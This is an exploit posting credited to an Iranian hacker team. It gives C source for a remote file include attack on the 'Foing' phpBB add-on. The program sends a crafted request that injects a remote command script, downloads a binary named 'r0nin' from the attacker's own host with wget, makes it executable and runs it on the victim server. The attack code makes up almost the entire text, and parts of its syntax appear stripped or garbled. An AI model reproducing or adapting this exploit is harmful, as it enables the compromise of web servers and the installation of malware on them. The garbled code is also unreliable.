vendor : phpbbhacks.com
Exploit BY :s3rv3r_hack3r
WWW : http://www.hackerz.ir
Exploit
/* Foing Remote File Include exploit By s3rv3r_hack3r */
#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include arpa/inet.h
#define PORT 80
char shellop[] = GET
/index.php?phpbb_root_path=http://www.hackerz.ir/cmd.txt?cmd=cd
../../../../../../../../../../tmp;wget http://www.hackerz.ir/r0nin;;
chmod +X r0nin;./r0nin%60%22|\r;
int main(int argc, char *argv[]) {
char shell[BUFSIZ];
int sock;
struct sockaddr_in remop;
if(argc != 2) {
printf(\n\n);
printf(\n Iran Hackerz Security Team \n);
printf(\nWebSite's: www.hackerz.ir www.h4ckerz.com \n);
printf(\n\n);
printf(\n*Foing Remote File Include Vulnerability [PHPBB]* \n);
printf(\n\n);
printf(\nUsage: http://www.Victim.ltd/[foingpath]\n);
printf(\n\n);
return 0; }
if(argc == 2) {
printf(\n\n);
printf(\nExploit By : [EMAIL PROTECTED]\n);
printf(\nPLZ A W8\n);
printf(\n\n);
remop.sin_family = AF_INET;
remop.sin_port = htons(PORT);
remop.sin_addr.s_addr = inet_addr(argv[1]);
if((sock = socket(AF_INET, SOCK_STREAM, 0)) 0) {
printf(\nERROR: Socket()\n\n);
return -1; }
if(connect(sock,(struct sockaddr *)remop, sizeof(struct sockaddr)) 0) {
printf(\nERROR: Connect()\n\n);
return -1; }
if(send(sock,shellop, sizeof(shellop), 0) 0) {
printf(\nERROR: Send()\n\n);
return -1; }
close(sock);
sleep(3);
printf(\nr0nin run seccessfuly\n\n);
printf(\n); }
return 0; }